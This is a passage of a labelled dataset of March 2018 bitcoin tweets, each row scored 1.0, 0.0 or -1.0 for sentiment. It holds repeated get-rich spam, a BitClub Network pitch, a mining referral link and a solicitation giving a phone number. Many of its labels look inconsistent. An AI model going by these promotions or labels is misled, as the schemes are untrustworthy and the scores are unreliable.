0.00115192 BTC / 10.03 USD) +Final balance: 0.00115192 BTC / 10.03 USD +#donation #bitcoin #cryptopaymon 🤖🗿👍",1.0 +Fri Mar 23 00:50:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:50:42 +0000 2018,@AriseUniverse They probably use #BitCoin too,0.0 +Fri Mar 23 00:50:56 +0000 2018,@Bitcoin Don't kid yourself. The rich will always control to some degree because they have the buying power...,1.0 +Fri Mar 23 00:51:00 +0000 2018,@Thomas1774Paine Bitcoin,0.0 +Fri Mar 23 00:51:07 +0000 2018,Crypto shopping 🛒🛍 #crypto #bitcoin,0.0 +Fri Mar 23 00:51:17 +0000 2018,Bitcoin cash,0.0 +Fri Mar 23 00:51:21 +0000 2018,@caperthebard @stefapie You can buy ebaum's world merch with bitcoin,0.0 +Fri Mar 23 00:51:23 +0000 2018,"@Billyisgreat123 LOL, obviously your clueless, bitcoin is good, just not as good as it once was",1.0 +Fri Mar 23 00:51:30 +0000 2018,#Crypto #retweet bot. Follow for everything crypto. What to get your content #retweeted follow and DM I want retweet. #bitcoin,0.0 +Fri Mar 23 00:51:43 +0000 2018,imagine calling yourself the dude nextdoor screaming about Bitcoin on my timeline yikes,0.0 +Fri Mar 23 00:52:07 +0000 2018,"@NickSzabo4 Every node, not just Trusted 3rd party nodes like some blockchains. Bitcoin is KING! not just a pretender to the thrown.",0.0 +Fri Mar 23 00:52:14 +0000 2018,"@kyletorpey I would go with dev, bcash is based on bitcoin code base for a reason",-1.0 +Fri Mar 23 00:53:17 +0000 2018,ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering #ico #cryptocurrency #token,0.0 +Fri Mar 23 00:53:42 +0000 2018,@lopp @psycho_sage @naval Would this child understand Bitcoin as trustworthy and use it as peer to peer cash?,0.0 +Fri Mar 23 00:53:57 +0000 2018,"@Blued0g420 @MisterFarbridge yeah for sure, many things are over priced in this space. #Bitcoin is not one of them however 😎",1.0 +Fri Mar 23 00:54:10 +0000 2018,"Thanks to my persistence, hard work and constant observation of the markets I could create this FX Robot. #Close #CFD #Bitcoin",-1.0 +Fri Mar 23 00:55:02 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK!!",1.0 +Fri Mar 23 00:55:12 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:55:13 +0000 2018,@QTRResearch What’s bitcoin doing though,0.0 +Fri Mar 23 00:55:14 +0000 2018,Auggie velarde - bitcoin,0.0 +Fri Mar 23 00:55:20 +0000 2018,Bitcoin is still early in the network effects game,-1.0 +Fri Mar 23 00:55:29 +0000 2018,@Patatobear I got a bitcoin for yu in tarkov ovo,0.0 +Fri Mar 23 00:55:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:56:02 +0000 2018,"Optimal tx fee: 0 satoshi per byte. +BTC : $8694 / €7054 / £6161 @ Block 514743. +Market Cap: 147.33B USD. #Bitcoin #ビットコイン",0.0 +Fri Mar 23 00:56:04 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:56:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:56:09 +0000 2018,Current price of Bitcoin is $8681.47 #Bitcoin #Bithound,0.0 +Fri Mar 23 00:56:22 +0000 2018,"฿ value over 1 year: +796%, (+$7741.95) [Currently $8714.555] #bitcoin",0.0 +Fri Mar 23 00:56:40 +0000 2018,"@tferriss You mean bitcoin, right? C’mon this is a joke.",-1.0 +Fri Mar 23 00:58:02 +0000 2018,Related Instagram tags for #cryptocurrency: #bitcoin #blockchain #crypto #ethereum #btc #litecoin #coinbase #trading #forex #ico #bitcoins,0.0 +Fri Mar 23 00:58:03 +0000 2018,"Market Cap: $335,683,404,227.00 +Bitcoin Dominance: 43.99 % +24H Volume: $14,688,906,280.00 +$BTC #pampit #bogdanoff",0.0 +Fri Mar 23 00:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30499.00000000 | BITCOIN(BLCHAIN) R$28780.52 | LITECOIN(MCDTBC) R$577.10000000,0.0 +Fri Mar 23 00:59:06 +0000 2018,Current price of Bitcoin is $8704.67,0.0 +Fri Mar 23 00:59:35 +0000 2018,Bitcoin,0.0 +Fri Mar 23 00:59:40 +0000 2018,"I respect shitcoin's right to exist. + +Because all y'all ain't nothing more than Bitcoin testnets. + +We will jack all your innovations.",1.0 +Fri Mar 23 00:59:51 +0000 2018,@crypToBanger Bitcoin 2013/2014?,0.0 +Fri Mar 23 00:59:52 +0000 2018,Anyone else ever get that tingly feeling that we're part of something world-changing? #Bitcoin,0.0 +Fri Mar 23 01:00:00 +0000 2018,"Bad news: Bitcoin on the decline. +Current Rate: 8680.62 USD = 1 BTC",-1.0 +Fri Mar 23 01:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,721.02, market cap of $147,683,819,562 (44.04%), and 24 hr vol. of $5,484,840,000 (37.48%)",0.0 +Fri Mar 23 01:00:00 +0000 2018,"Mar 22, 2018 06:00PM #Bitcoin Price: +USD 8752.51 | EUR 7067.80 | JPY 936418.95",0.0 +Fri Mar 23 01:00:01 +0000 2018,Two Hour Lull Update: CryptoCompare Bitcoin price: $8664.23 #bitcoin,0.0 +Fri Mar 23 01:00:02 +0000 2018,"Average Bitcoin market price is: USD 8,675.33, EUR 7,046.78",-1.0 +Fri Mar 23 01:00:02 +0000 2018,"Bitcoin:$8721.02 +Ethereum:$540.487 +Bitcoin Cash:$1017.03 +Litecoin:$163.289 +Ripple:$0.657819 +IOTA:$1.33",0.0 +Fri Mar 23 01:00:02 +0000 2018,Current BTC Dominance: 44.01% #Bitcoin #Altcoin #Cryptocurrency,0.0 +Fri Mar 23 01:00:02 +0000 2018,"Bitcoin - BTC +Price: $8,721.02 +Change in 1h: -0.14% +Market cap: $147,683,819,562.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 01:00:07 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:00:03 +0000 2018,"1 bitcoin = $8721.02 / 7078.415€ +1 bitcoin-cash = $1017.03 / 825.472€ +1 ethereum = $540.092 / 438.365€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 01:00:03 +0000 2018,"1 bitcoin = $8721.02 / 7078.415€ +1 bitcoin-cash = $1017.03 / 825.472€ +1 ethereum = $540.092 / 438.365€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 01:00:13 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8650.00/$8652.82 #Bitstamp +$8620.00/$8632.10 #Kraken +⇢$-32.82/$-17.90 +$8598.93/$8685.36 #Coinbase +⇢$-53.89/$35.36",0.0 +Fri Mar 23 01:00:17 +0000 2018,Install CryptoTab and mine Bitcoin! httpGet more than 1 BTC per month! Develop the network and get your rewardss://getcryptotab.com/422427,1.0 +Fri Mar 23 01:00:27 +0000 2018,#XEM Price is 0.00003374 (-0.00000011) #BTC / 0.292824 (-0.00112) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 01:00:29 +0000 2018,#ADA Price is 0.00002297 (-0.00000011) #BTC / 0.199412 (-0.00104) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 01:00:29 +0000 2018,#DASH Price is 0.0474768 (-0.00029230) #BTC / 412.08 (-2.72100) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 01:00:29 +0000 2018,#SUB Price is 0.00004829 (+0.00000056) #BTC / 0.419721 (+0.00527) #USD. Market rank is 114. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 01:00:30 +0000 2018,#EOS Price is 0.00079116 (-0.00000373) #BTC / 6.86695 (-0.03540) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 01:00:30 +0000 2018,"BTC hourly update +$8689.58 | -0.0032%📉 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 01:00:38 +0000 2018,Current price of #Bitcoin is $8650.00,0.0 +Fri Mar 23 01:00:53 +0000 2018,"Fri Mar 23 02:00:20 2018 (10:57) +USD : 8651.21 +Wght: 0.43 +Blk#: 514744 +Size: 491.3 KB +TXs: 1165 +Pool: 60 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 01:01:00 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:01:06 +0000 2018,Curious about where $BTC stands? Bitcoin is $8650.00 Enjoy your day. ↕️,1.0 +Fri Mar 23 01:01:15 +0000 2018,#Bitcoin Price 8650.00 USD via Chain,0.0 +Fri Mar 23 01:01:32 +0000 2018,"1,255 increase in MPI over sale of Bitcoin!!!!!!! (from this month over last month) Go! Go! Go!!",0.0 +Fri Mar 23 01:01:32 +0000 2018,New #bitcoin block 0000000000000000000ddc396a7ed473727624a4e72287b0d9b45c8c6a1022c5 mined at height 514744.,1.0 +Fri Mar 23 01:01:43 +0000 2018,Current price of Bitcoin is $8650.00 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 01:02:06 +0000 2018,Current price of Bitcoin is $8650.00,0.0 +Fri Mar 23 01:02:08 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:02:46 +0000 2018,@OTC_Bitcoin Will we see a 6k or lower bitcoin?,0.0 +Fri Mar 23 01:03:29 +0000 2018,Current price of Bitcoin is $8650.00 #BTC,0.0 +Fri Mar 23 01:03:29 +0000 2018,@freebitco hello i want to win bitcoin,1.0 +Fri Mar 23 01:03:35 +0000 2018,Bitcoin 8650.00 $,0.0 +Fri Mar 23 01:03:58 +0000 2018,".Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:04:06 +0000 2018,@eskintan Thanks for supporting my art and #bitcoin brother!,1.0 +Fri Mar 23 01:04:08 +0000 2018,"Broke: Trying to identify and support young promising shitcoins. + +Woke: Trying to identify and support young promising Bitcoin talent.",1.0 +Fri Mar 23 01:04:11 +0000 2018,"@zerosum0x0 @sundhaug92 ""I hacked Bitcoin using this weird trick!""",-1.0 +Fri Mar 23 01:04:14 +0000 2018,"Enough people agreed that something with no intrinsic value is a tradeable commodity, so now we have President Bitcoin. Is that it?",0.0 +Fri Mar 23 01:04:18 +0000 2018,Really need my crypto to blow up so I can buy a bitcoin gat,1.0 +Fri Mar 23 01:04:20 +0000 2018,Current price of Bitcoin is $8650.00.,0.0 +Fri Mar 23 01:04:29 +0000 2018,@TronNews_ Do you think trx will ever get rid off Bitcoin and become more steady?,1.0 +Fri Mar 23 01:04:45 +0000 2018,"""Bitcoin Core is a cult trapped in a world of platonic forms."" - @DanielKrawisz @Satoshis_Vision Conference",-1.0 +Fri Mar 23 01:04:50 +0000 2018,"@GlennDuggan Exactly, I also only pay with bitcoin to avoid a paper trail.",1.0 +Fri Mar 23 01:04:54 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:05:37 +0000 2018,@DepressionEcon And after bitcoin is done pumping. It’ll be our time lol,1.0 +Fri Mar 23 01:05:49 +0000 2018,Bitcoin daily looks like a retest of 8k is extremely likely $BTC $CRYPTO,0.0 +Fri Mar 23 01:06:02 +0000 2018,"Bitcoin is my hedge. With the DJIA down 700+, if the global economy craps the bed in the next 10 years, Bitcoin will Rule... +#Bitcoin",-1.0 +Fri Mar 23 01:06:57 +0000 2018,Hey... here's some TA or whatever... #bitcoin is going to go sideways for FUCKING EVER!!!!!!,-1.0 +Fri Mar 23 01:09:14 +0000 2018,"I have 1,000 dollars in bitcoin and not afraid to use it",1.0 +Fri Mar 23 01:09:24 +0000 2018,BTC $8721.02 Down -$0.55 -0.01% in the last hour #bitcoin #bitsmart,-1.0 +Fri Mar 23 01:09:34 +0000 2018,I want to learn!!! About Bitcoin,0.0 +Fri Mar 23 01:09:35 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:10:02 +0000 2018,"1 bitcoin = $8691.95 / 7054.821€ +1 bitcoin-cash = $1014.12 / 823.11€ +1 ethereum = $537.774 / 436.484€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 01:10:02 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:10:06 +0000 2018,"Bitcoin BTC Current Price: +$8.716,300 +1 Hour: -0.15 % | 24 Hours: -3.22 % | 7 Days: 5.95 % +#btc #bitcoin",0.0 +Fri Mar 23 01:10:18 +0000 2018,"I used #bitcoin to buy headphones yesterday and they're gonna be here on Monday... +What a time to be alive.",1.0 +Fri Mar 23 01:10:21 +0000 2018,#Blockchain is the tech. #Bitcoin is merely the first mainstream manifestation of its potential. #freecoins,-1.0 +Fri Mar 23 01:10:28 +0000 2018,"HOY 22/3/18 euro Bs 284.672,70 c.c.t(tranf) Bs 259.622,64 +D.l.r bitcoin Bs258.889,58 today Bs 231.334,02",0.0 +Fri Mar 23 01:10:38 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:12:08 +0000 2018,Drive Genuine Cryptocurrency bitcoin traffic for ICO for $5: Welcome to the best bitcoin website traffic Want to Get…,1.0 +Fri Mar 23 01:12:11 +0000 2018,"Bitcoin will be succesful long term if we worship a decentralized system, not a centralized leader.",-1.0 +Fri Mar 23 01:12:55 +0000 2018,"@_Kevin_Pham how much did you invest to mine Bitcoin, Kevin ?",1.0 +Fri Mar 23 01:13:15 +0000 2018,@CNN sooo what you're saying is only buy #bitcoin that is #madeintheusa,0.0 +Fri Mar 23 01:13:25 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:13:54 +0000 2018,"Fri Mar 23 02:13:32 2018 (13:12) +USD : 8623.96 +Wght: 0.43 +Blk#: 514745 +Size: 550.9 KB +TXs: 1442 +Pool: 34 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 01:14:21 +0000 2018,"Current Bitcoin Price = $9693.62 --- Includes Sum of Forks, Core $8624.00 (88.97%) + Cash $1010.13 (10.42%) + Gold $59.49 (0.61%)",0.0 +Fri Mar 23 01:14:34 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:14:35 +0000 2018,"please give me +32yyeXCAqrxbKMvSDP9ymib64wJfB8GUbe + +#Ripple +#Bitcoin +#help",0.0 +Fri Mar 23 01:14:39 +0000 2018,New #bitcoin block 00000000000000000009fb95b43a4042b322c5468c7763368920718708ff65a0 mined at height 514745.,1.0 +Fri Mar 23 01:15:01 +0000 2018,"The current price of Bitcoin is $8666.39. +The current price of BCash is $1007.41, or 0.116903 BTC",0.0 +Fri Mar 23 01:15:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:16:28 +0000 2018,"""Bitcoin Core don't support creativity of people they don't know"" - @DanielKrawisz at @Satoshis_Vision #satoshisvision #BitcoinCash #bch",0.0 +Fri Mar 23 01:16:58 +0000 2018,ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering #ico #cryptocurrency #token #ROX #Robotinaico,0.0 +Fri Mar 23 01:17:06 +0000 2018,"Bitcoin Cash BCH Current Price: +$1.010,820 +1 Hour: -0.06 % | 24 Hours: -3.66 % | 7 Days: 8.95 % +#bch #bitcoin cash",0.0 +Fri Mar 23 01:17:35 +0000 2018,@_Kevin_Pham Trumps retarded policies and actions are about to make bitcoin way more valuable...probably sooner than later.,-1.0 +Fri Mar 23 01:17:52 +0000 2018,"@pwthornton Bitcoin fans: Fuck the FDIC and big government regulations! +Also Bitcoin fans: What the fuck just happened to my money?",-1.0 +Fri Mar 23 01:18:03 +0000 2018,@twobitidiot Same. Gold is seen as a global currency and bitcoin is the new age version of it.,1.0 +Fri Mar 23 01:19:02 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:19:46 +0000 2018,@ValoremF a great bonus to pursue. #AdVelorem #Bitcoin #Valorem #Ico,1.0 +Fri Mar 23 01:19:49 +0000 2018,"@pipis @makmummasjid Me ; +PINTEREST RENEGADE, BRANDING INTERN, BITCOIN CZAR. IGNORING YOUR PASSION IS LIKE DYING A SLOW DEATH.",-1.0 +Fri Mar 23 01:20:04 +0000 2018,"1 bitcoin = $8648.6 / 7019.636€ +1 bitcoin-cash = $1012.28 / 821.617€ +1 ethereum = $534.693 / 433.983€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 01:20:39 +0000 2018,@tanjrinidad bitcoin,0.0 +Fri Mar 23 01:20:57 +0000 2018,@rogerkver @Falkvinge Bitcoin #BCH Leaders 🌎✌🏻,0.0 +Fri Mar 23 01:21:30 +0000 2018,@nlckstephens is bitcoin a woke ally,0.0 +Fri Mar 23 01:21:32 +0000 2018,somebody teach me how to use bitcoin so I can get some actual coinT,0.0 +Fri Mar 23 01:22:20 +0000 2018,@illusionfoxe in fact by mining a bitcoin you actually end up spending a bunch of money. and/or burning your house down. or both.,-1.0 +Fri Mar 23 01:22:38 +0000 2018,Celebrate birthday and take interesting prizes with @bethereumteam #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr,1.0 +Fri Mar 23 01:23:08 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:23:18 +0000 2018,"Your bet, your rules! This is how says @bethereumteam #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr",0.0 +Fri Mar 23 01:23:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:24:10 +0000 2018,"Should be buy Tron or not? + #trx #tron #altcoins #cryptocurrency #ethereum #bitcoin",0.0 +Fri Mar 23 01:24:15 +0000 2018,@rogerkver @Falkvinge Only diet Bitcoin Cash Lite will be left after all the rubble of Vers massive poop dumps is through.,0.0 +Fri Mar 23 01:24:38 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:24:46 +0000 2018,@crypto_capone Bitcoin.,0.0 +Fri Mar 23 01:25:42 +0000 2018,"Satoshi's genius was building a system that didn't need him to be succesful. + +Bitcoin is self-sufficient.",0.0 +Fri Mar 23 01:26:21 +0000 2018,@APompliano but what if someone killed all the bitcoin developers?,-1.0 +Fri Mar 23 01:26:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:26:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:26:45 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:26:49 +0000 2018,Satoshi Nakamoto as banned the project of bitcoin in 2015. So making money off a dead coin pure trolling!,1.0 +Fri Mar 23 01:27:15 +0000 2018,"@CryptoCamel1 @MoonOverlord I hate to tell you this... but even 10,000 50k+ follower accounts don't make 24k bitcoin volume.",-1.0 +Fri Mar 23 01:27:47 +0000 2018,#bitcoin #elliot 5th wave coming with squeeze over 9200,0.0 +Fri Mar 23 01:28:01 +0000 2018,@ashleyfeinberg will you throw me a party with your bitcoin money to unveil,0.0 +Fri Mar 23 01:28:20 +0000 2018,"@buzzshownetwork +This project is great +#Bitcoin #ICO #BTC #ETH #YouTube",1.0 +Fri Mar 23 01:28:21 +0000 2018,@brian_lovin @ruzannaroz If someone can tell me a quick shortcut for the degrees symbol I’ll give you all the Bitcoin I own,1.0 +Fri Mar 23 01:28:42 +0000 2018,"@mybtcnig I'm from China. I need a lot of gift card and bitcoin. Can you see the price list of your goods? +My whatsapp:+8618678303679",0.0 +Fri Mar 23 01:28:49 +0000 2018,@option_snipper For a second I thought the chart belongs to bitcoin LOL,1.0 +Fri Mar 23 01:29:01 +0000 2018,@Dry_Observer @DrDenaGrayson @ericgarland what are the references to bitcoin? i must’ve missed this connection.,0.0 +Fri Mar 23 01:29:35 +0000 2018,how many out there have applied the Ichimoku Cloud to trading #bitcoin?,1.0 +Fri Mar 23 01:29:58 +0000 2018,"@xkeepah @illusionfoxe not to mention, that recent report that talked about how every bitcoin(?) contains CP",0.0 +Fri Mar 23 01:30:02 +0000 2018,"Bitcoin:$8650.44 +Ethereum:$534.767 +Bitcoin Cash:$1010.69 +Litecoin:$162.129 +Ripple:$0.650947 +IOTA:$1.31849",0.0 +Fri Mar 23 01:30:04 +0000 2018,"1 bitcoin = $8650.44 / 7021.129€ +1 bitcoin-cash = $1007.59 / 817.81€ +1 ethereum = $534.767 / 434.043€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 01:30:04 +0000 2018,One Bitcoin now worth $8557.49@bitstamp. High $9099.590. Low $8503.520. Market Cap $144.899 Billion #bitcoin,1.0 +Fri Mar 23 01:30:20 +0000 2018,@AndrewQuackson The Bolton move was set up by Barron for bitcoin gainz.,0.0 +Fri Mar 23 01:30:27 +0000 2018,#XEM Price is 0.00003330 (-0.00000044) #BTC / 0.286412 (-0.00641) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 01:30:28 +0000 2018,#EOS Price is 0.00077699 (-0.00001417) #BTC / 6.69056 (-0.17639) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 01:30:29 +0000 2018,#ADA Price is 0.00002276 (-0.00000021) #BTC / 0.195699 (-0.00371) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 01:30:29 +0000 2018,#DASH Price is 0.0472481 (-0.00022870) #BTC / 406.329 (-5.75100) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 01:30:30 +0000 2018,#SUB Price is 0.00004793 (-0.00000036) #BTC / 0.412197 (-0.00752) #USD. Market rank is 114. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 01:30:34 +0000 2018,Current price of Bitcoin is $8704.67 #Bitcoin #Bithound,0.0 +Fri Mar 23 01:30:45 +0000 2018,What’s up with them bitcoin wallets... y’all been quiet lately.. talk to me,-1.0 +Fri Mar 23 01:30:58 +0000 2018,"⚜ Status Update: Tracking 314 Bitcoin addresses with a current balance of 162.65K BTC / 1.40B USD +#bitcoin #cryptopaymon 🤖",0.0 +Fri Mar 23 01:31:06 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:31:11 +0000 2018,@rogerkver @Falkvinge isn't he the guy who put the Child Porn on Bitcoin blockchain?,0.0 +Fri Mar 23 01:31:14 +0000 2018,"Hello humans, #Bitcoin is currently around $8644.33 as of Thu Mar 22 20:31:10 CDT 2018",0.0 +Fri Mar 23 01:31:36 +0000 2018,@mohsen1987 @BTCTN Time to unsubscribe from Roger controlled Twitter account @BTCTN #bitcoin,0.0 +Fri Mar 23 01:31:58 +0000 2018,"@thealicemoon twitter, instagram, my bike apps, and all my bitcoin apps LOLz",0.0 +Fri Mar 23 01:31:59 +0000 2018,@Blockchain_Jay @Altcoinbuzzio So why is bitcoin such a shithead?,0.0 +Fri Mar 23 01:32:08 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:32:22 +0000 2018,"#Bitcoin is based on #blockchain. A public ledger of transactions that's safe, huge potential to be future currency. #bitcoinminer",1.0 +Fri Mar 23 01:32:26 +0000 2018,"Fri Mar 23 02:31:58 2018 (18:26) +USD : 8596.62 +Wght: 0.43 +Blk#: 514746 +Size: 924.5 KB +TXs: 2069 +Pool: 47 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 01:32:28 +0000 2018,@JessicaHuseman He's going to create a bitcoin-economy sovereign nation Web site called Bannsylvania?,0.0 +Fri Mar 23 01:32:37 +0000 2018,bitcoin: the movie,0.0 +Fri Mar 23 01:32:43 +0000 2018,@ezbreh @altcointhoreau easy.. sell house when 3k and buy more bitcoin,1.0 +Fri Mar 23 01:33:09 +0000 2018,"$BTC #bitcoin +Scalp trade entered: $8580",0.0 +Fri Mar 23 01:33:13 +0000 2018,"@thecryptokidd @rogerkver @Falkvinge Be carefull, bitcoin ticker is not $BCH, that's the ticker for bcash",0.0 +Fri Mar 23 01:33:24 +0000 2018,New #bitcoin block 00000000000000000048e6d5fc56c1eb43530236193bd8bec8101caf8f2befd7 mined at height 514746.,1.0 +Fri Mar 23 01:33:42 +0000 2018,So @rocketman_ai you like #Bitcoin & #Crypto Cool 👍🏻 Great to connect RocketMan much appreciated,1.0 +Fri Mar 23 01:33:57 +0000 2018,@rawnstet I didn't know you were into bitcoin!!,0.0 +Fri Mar 23 01:34:54 +0000 2018,"Go home, Bitcoin, you’re drunk.",-1.0 +Fri Mar 23 01:34:58 +0000 2018,Never bring up #bitcoin during a bachelor party...... @skutty21 @stvnclmnt @Sussy28,0.0 +Fri Mar 23 01:35:29 +0000 2018,#bitcoin -- to all you traders prolonging progress. Time to let it fall and the market to consolidate. #letitfall,0.0 +Fri Mar 23 01:35:41 +0000 2018,"Your bet, your rules! This is how says @bethereumteam #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr",0.0 +Fri Mar 23 01:35:57 +0000 2018,"Your bet, your rules! This is how says Bethereum #bethereum #bitcoin #news #crypto #blockchain #betting #tokensupply #bthr",0.0 +Fri Mar 23 01:35:57 +0000 2018,"☄ Status Update: Tracking 314 Bitcoin addresses with a current balance of 162.65K BTC / 1.40B USD +#bitcoin #cryptopaymon 🤖",0.0 +Fri Mar 23 01:36:58 +0000 2018,"What will the eventual, full-blown, Hollywood movie about Bitcoin be called? + +My guess: + +""Holders"" + +#BTC #cryptocurrencies",0.0 +Fri Mar 23 01:37:13 +0000 2018,"The current price of Bitcoin is $8666.39. +The current price of BCash is $1007.41, or 0.116903 BTC",0.0 +Fri Mar 23 01:37:39 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:37:45 +0000 2018,Bitcoin will be succesful because it's not beholden to quarterly earnings calls or four year political cycles.,0.0 +Fri Mar 23 01:38:05 +0000 2018,@cryptorick_ That's the only reason Bitcoin exists..,0.0 +Fri Mar 23 01:38:22 +0000 2018,"Bitcoin will be succesful because it's not beholden to quarterly earnings calls or four year political cycles. + +Two-time preference.",0.0 +Fri Mar 23 01:38:28 +0000 2018,"@MrHodl @rogerkver @Falkvinge #Bitcoin touched @rogerkver somewhere, that is why he hates it. All makes sense now.",0.0 +Fri Mar 23 01:39:17 +0000 2018,Bitcoin news sentiment changed to Negative in the last hour #bitcoin #bitsmart,-1.0 +Fri Mar 23 01:39:28 +0000 2018,"It is a exiting news. I hope it will be a great project. +#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",1.0 +Fri Mar 23 01:39:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:39:33 +0000 2018,"Correcting wrong or strange Kanji Tattoo designs. +1 revision = 0.00005bitcoin +Give me DM or reply. +#Japanese #Kanji #tattoo #bitcoin",-1.0 +Fri Mar 23 01:39:59 +0000 2018,Bitcoin as a response to Woke Capital ascending to banking infrastructure. God Bless programming,0.0 +Fri Mar 23 01:40:01 +0000 2018,"BTC-KORE AskRate: 0.00035205 #Bittrex #KORE $KORE #Kore #altcoin #bitcoin #cryptocurrencies + ♥ FOLLOW for PROFIT",1.0 +Fri Mar 23 01:40:04 +0000 2018,"1 bitcoin = $8631.56 / 7005.805€ +1 bitcoin-cash = $1007.08 / 817.396€ +1 ethereum = $533.447 / 432.972€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 01:40:10 +0000 2018,Ready Player One is a synonym for bitcoin,1.0 +Fri Mar 23 01:40:30 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:40:32 +0000 2018,"Yes, I'm reading all the updated exchange TOU's. But I'm sure as hell not liking it. #bitcoin.",1.0 +Fri Mar 23 01:41:10 +0000 2018,@TradeSatoshi Deposited some bitcoin a couple of hours ago. Still hasn’t shown!,0.0 +Fri Mar 23 01:41:21 +0000 2018,"฿ value over 3 months: --39.23%, ($-5558.76) [Currently $8611.245] #bitcoin",0.0 +Fri Mar 23 01:41:38 +0000 2018,@fixcars *the evolved bitcoin markets*,0.0 +Fri Mar 23 01:42:21 +0000 2018,"Cityof Atlanta has a cyber attacker? +locked them out of accounts for ransom in bitcoin or sumn 